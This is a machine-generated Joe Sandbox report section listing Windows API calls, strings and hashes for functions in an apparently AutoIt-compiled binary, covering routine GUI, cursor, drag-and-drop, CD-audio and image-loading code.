• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: ca6b925ee9d3801c182e15166b1aa59ac4f2da971a2d616a1b28eac00ddb2524
• Instruction ID: 0191aa2e62e5015ebafbf6a34ed0a86b6040c645b411a1888b0b78149c687746
• Opcode Fuzzy Hash: ca6b925ee9d3801c182e15166b1aa59ac4f2da971a2d616a1b28eac00ddb2524
• Instruction Fuzzy Hash: 49B17E7960020AEFDB14DFA8CD45FEE7BB4FB18314F10422AFA15E6290DBB89841DB55
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0051A47A
• __swprintf.LIBCMT ref: 0051A51B
• _wcscmp.LIBCMT ref: 0051A52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0051A583
• _wcscmp.LIBCMT ref: 0051A5BF
• GetClassNameW.USER32(?,?,00000400), ref: 0051A5F6
• GetDlgCtrlID.USER32(?), ref: 0051A648
• GetWindowRect.USER32(?,?), ref: 0051A67E
• GetParent.USER32(?), ref: 0051A69C
• ScreenToClient.USER32(00000000), ref: 0051A6A3
• GetClassNameW.USER32(?,?,00000100), ref: 0051A71D
• _wcscmp.LIBCMT ref: 0051A731
• GetWindowTextW.USER32(?,?,00000400), ref: 0051A757
• _wcscmp.LIBCMT ref: 0051A76B
  • Part of subcall function 004E362C: _iswctype.LIBCMT ref: 004E3634
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
• Opcode ID: 3d2a95ab5ea1f0eeb0226a9ebc739b69526e1d5d622b90f8d1808f600b3223e0
• Instruction ID: c1e67dd5317ec5204cec40a79327685ed33d65fe3b95a32885ff44733c5cebad
• Opcode Fuzzy Hash: 3d2a95ab5ea1f0eeb0226a9ebc739b69526e1d5d622b90f8d1808f600b3223e0
• Instruction Fuzzy Hash: A3A1D371205306AFEB16DF64C884FEABBE8FF44315F044529F999C2190DB34EA85CB92
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0051AF18
                                                                                                                      • _wcscmp.LIBCMT ref: 0051AF29
                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0051AF51
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0051AF6E
                                                                                                                      • _wcscmp.LIBCMT ref: 0051AF8C
                                                                                                                      • _wcsstr.LIBCMT ref: 0051AF9D
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0051AFD5
                                                                                                                      • _wcscmp.LIBCMT ref: 0051AFE5
                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0051B00C
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0051B055
                                                                                                                      • _wcscmp.LIBCMT ref: 0051B065
                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0051B08D
                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 0051B0F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                      • Opcode ID: 3dda2883acce32bb25ce49d04eadc1ddcb7df09c60e6c64eef4dc372bf14ac03
                                                                                                                      • Instruction ID: 82524e9d3f6e369c0c117af48e1cd43a494669ac781403ef189739b8ac9ff01f
                                                                                                                      • Opcode Fuzzy Hash: 3dda2883acce32bb25ce49d04eadc1ddcb7df09c60e6c64eef4dc372bf14ac03
                                                                                                                      • Instruction Fuzzy Hash: 6A818E75108205ABFB05DF15C885FEA7BE8FF54318F04846AFD898A096DB34DD8ACB61
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0054C627
                                                                                                                        • Part of subcall function 0054AB37: ClientToScreen.USER32(?,?), ref: 0054AB60
                                                                                                                        • Part of subcall function 0054AB37: GetWindowRect.USER32(?,?), ref: 0054ABD6
                                                                                                                        • Part of subcall function 0054AB37: PtInRect.USER32(?,?,0054C014), ref: 0054ABE6
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0054C690
                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0054C69B
                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0054C6BE
                                                                                                                      • _wcscat.LIBCMT ref: 0054C6EE
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0054C705
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0054C71E
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0054C735
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0054C757
                                                                                                                      • DragFinish.SHELL32(?), ref: 0054C75E
                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0054C851
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbX
                                                                                                                      • API String ID: 169749273-4238052319
                                                                                                                      • Opcode ID: 885e0d49ec20f7f7087029038e408ce71affd5477bd0931f23fe8959d8db0544
                                                                                                                      • Instruction ID: 1ee39326d4267307927b9ee5501c2ba4f26594eeafae706a96b6c87d94aa7d20
                                                                                                                      • Opcode Fuzzy Hash: 885e0d49ec20f7f7087029038e408ce71affd5477bd0931f23fe8959d8db0544
                                                                                                                      • Instruction Fuzzy Hash: 30618875108301AFC701EF64D889EABBFE8FF99358F00092EF595921A1DB309909DB66
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                      • Opcode ID: d908ea08c7e55c903ed237173b51e99b28bb47f38ab51a08c4c6748e5155b3f6
                                                                                                                      • Instruction ID: 7ba913ee3cd676acd2669aebab243150861b16ca74efb304ea63e7512f7fb795
                                                                                                                      • Opcode Fuzzy Hash: d908ea08c7e55c903ed237173b51e99b28bb47f38ab51a08c4c6748e5155b3f6
                                                                                                                      • Instruction Fuzzy Hash: 1131D434548209A7FA01EA66FE03FEE7F64BB14719F20442EB405710D2FA656F44D996
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00535013
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0053501E
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00535029
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00535034
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0053503F
                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0053504A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00535055
                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00535060
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0053506B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00535076
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00535081
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0053508C
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00535097
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 005350A2
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 005350AD
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 005350B8
                                                                                                                      • GetCursorInfo.USER32(?), ref: 005350C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$Load$Info
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2577412497-0
                                                                                                                      • Opcode ID: 0a7798035bceb96f99b5db3cea70280a90544d84a06f749b205b8c6d9be98408
                                                                                                                      • Instruction ID: dd063cec51535c9b8980eb6b50c44b8e0db601018c81851e3f0cf3b5a45c897f
                                                                                                                      • Opcode Fuzzy Hash: 0a7798035bceb96f99b5db3cea70280a90544d84a06f749b205b8c6d9be98408
                                                                                                                      • Instruction Fuzzy Hash: 3A3115B1D083196ADF109FB68C8999FBFE8FF04754F50453AA50CE7280EA796504CFA1
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0054A259
                                                                                                                      • DestroyWindow.USER32(?,?), ref: 0054A2D3
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0054A34D
                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0054A36F
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0054A382
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0054A3A4
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004C0000,00000000), ref: 0054A3DB
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0054A3F4
                                                                                                                      • GetDesktopWindow.USER32 ref: 0054A40D
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0054A414
                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0054A42C
                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0054A444
                                                                                                                        • Part of subcall function 004C25DB: GetWindowLongW.USER32(?,000000EB), ref: 004C25EC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                      • API String ID: 1297703922-3619404913
                                                                                                                      • Opcode ID: 70da3bd47d86d20dc5ddddd9e8c9d90031404e91ebfae567e1af33da366d7628
                                                                                                                      • Instruction ID: 83acbffc2e9528c3aa4cb793e649b25452a2725677b7042c85978cb768e6afd9
                                                                                                                      • Opcode Fuzzy Hash: 70da3bd47d86d20dc5ddddd9e8c9d90031404e91ebfae567e1af33da366d7628
                                                                                                                      • Instruction Fuzzy Hash: 2871D374180204AFDB61CF28CC48FAA7BE5FB99308F04451DF985972A0E7B4E906EF52
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00544424
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0054446F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                      • Opcode ID: 88335a2d4fa44f9b075556f4aed3d127029b999e08ef30882abd788ac49bfa78
                                                                                                                      • Instruction ID: a894749573ae30083a84d8ba6bf5ab542fb2e30a73a28df3a8f44ff2d0386344
                                                                                                                      • Opcode Fuzzy Hash: 88335a2d4fa44f9b075556f4aed3d127029b999e08ef30882abd788ac49bfa78
                                                                                                                      • Instruction Fuzzy Hash: B6917C742007019BCB04EF11C455BAEBBE1BF95358F05886DF8965B3A2CB34ED8ACB95
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0054B8B4
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005491C2), ref: 0054B910
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0054B949
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0054B98C
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0054B9C3
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0054B9CF
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0054B9DF
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,005491C2), ref: 0054B9EE
                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0054BA0B
                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0054BA17
                                                                                                                        • Part of subcall function 004E2EFD: __wcsicmp_l.LIBCMT ref: 004E2F86
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                      • API String ID: 1212759294-1154884017
                                                                                                                      • Opcode ID: 956645e58dcf465e09fda21102916fd86c3c7b27ce7d88b13b315c55449bd054
                                                                                                                      • Instruction ID: e1dc4ab9de69018f0338fd9da2969cb8ccdf6a19dc0e2b60188e3d08c91f2190
                                                                                                                      • Opcode Fuzzy Hash: 956645e58dcf465e09fda21102916fd86c3c7b27ce7d88b13b315c55449bd054
                                                                                                                      • Instruction Fuzzy Hash: B161BB71940219BAEB14DF69CC45FFA7BACFB08719F10451AF915D61C0DBB8E980EBA0
APIs
• GetLocalTime.KERNEL32(?), ref: 0052DCDC
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0052DCEC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0052DCF8
• __wsplitpath.LIBCMT ref: 0052DD56
• _wcscat.LIBCMT ref: 0052DD6E
• _wcscat.LIBCMT ref: 0052DD80
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052DD95
• SetCurrentDirectoryW.KERNEL32(?), ref: 0052DDA9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0052DDDB
• SetCurrentDirectoryW.KERNEL32(?), ref: 0052DDFC
• _wcscpy.LIBCMT ref: 0052DE08
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0052DE47
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: f009a3dbf1b69775ee526aff6065a218324f3deb9902d17dd91653415bd5fcef
• Instruction ID: 6e75a8c18274454367bb46f4a9b53ccf9bc6af12c63839325c00730c9af31032
• Opcode Fuzzy Hash: f009a3dbf1b69775ee526aff6065a218324f3deb9902d17dd91653415bd5fcef
• Instruction Fuzzy Hash: 2C618C76104215AFCB10EF21D844EAEB7F8BF8A314F04481EF98997291DB35ED45CBA2
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00529C7F
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00529CA0
• __swprintf.LIBCMT ref: 00529CF9
• __swprintf.LIBCMT ref: 00529D12
• _wprintf.LIBCMT ref: 00529DB9
• _wprintf.LIBCMT ref: 00529DD7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
• Opcode ID: 195eb91de93de5cb4399a3dd6b16ac2d29fe603b8ebfc242d33112f3b87b2ec4
• Instruction ID: 134d16f6fa918f1243f137a9b37ec1b58c6c597cf7070c29f9eeb35ab349c23a
• Opcode Fuzzy Hash: 195eb91de93de5cb4399a3dd6b16ac2d29fe603b8ebfc242d33112f3b87b2ec4
• Instruction Fuzzy Hash: 5B51A17590050AABCF15EBE1DD46EEEBB78BF14304F50406AB509721A1EB352E48DF64
APIs
  • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
  • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
• CharLowerBuffW.USER32(?,?), ref: 0052A3CB
• GetDriveTypeW.KERNEL32 ref: 0052A418
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0052A460
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0052A497
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0052A4C5
  • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: df137467492994410f28dec4ffc834a7475f4a300b6d2c7df7584f938335a4b8
• Instruction ID: dd2ad43b8d5e27c7cc9c3196c64935e93c88b3e8263827aa35f36501eb33826c
• Opcode Fuzzy Hash: df137467492994410f28dec4ffc834a7475f4a300b6d2c7df7584f938335a4b8
• Instruction Fuzzy Hash: 0B518B751043049FC740EF11D885D6ABBE4FF99718F00886EF89A972A1DB35ED0ACB96
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,004FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0051F8DF
• LoadStringW.USER32(00000000,?,004FE029,00000001), ref: 0051F8E8
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,004FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0051F90A
• LoadStringW.USER32(00000000,?,004FE029,00000001), ref: 0051F90D
• __swprintf.LIBCMT ref: 0051F95D
• __swprintf.LIBCMT ref: 0051F96E
• _wprintf.LIBCMT ref: 0051FA17
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0051FA2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: c425a0e3991ce9defd4a7464fc982ee697bbc3ee0d15507fbdd29bc28c2ef0d2
• Instruction ID: f3e9cbe41f1da63fd6251e9dbe71b5359f555fc432122c9e93ba70c1f68e200c
• Opcode Fuzzy Hash: c425a0e3991ce9defd4a7464fc982ee697bbc3ee0d15507fbdd29bc28c2ef0d2
• Instruction Fuzzy Hash: A7414176900109ABCB05FBE1DD4AEFE7B78AF54315F50006EB50572092EA396F49CF64
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00549207,?,?), ref: 0054BA56
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BA6D
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BA78
• CloseHandle.KERNEL32(00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BA85
• GlobalLock.KERNEL32(00000000), ref: 0054BA8E
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BA9D
• GlobalUnlock.KERNEL32(00000000), ref: 0054BAA6
• CloseHandle.KERNEL32(00000000,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BAAD
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00549207,?,?,00000000,?), ref: 0054BABE
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00552CAC,?), ref: 0054BAD7
• GlobalFree.KERNEL32(00000000), ref: 0054BAE7
• GetObjectW.GDI32(00000000,00000018,?), ref: 0054BB0B
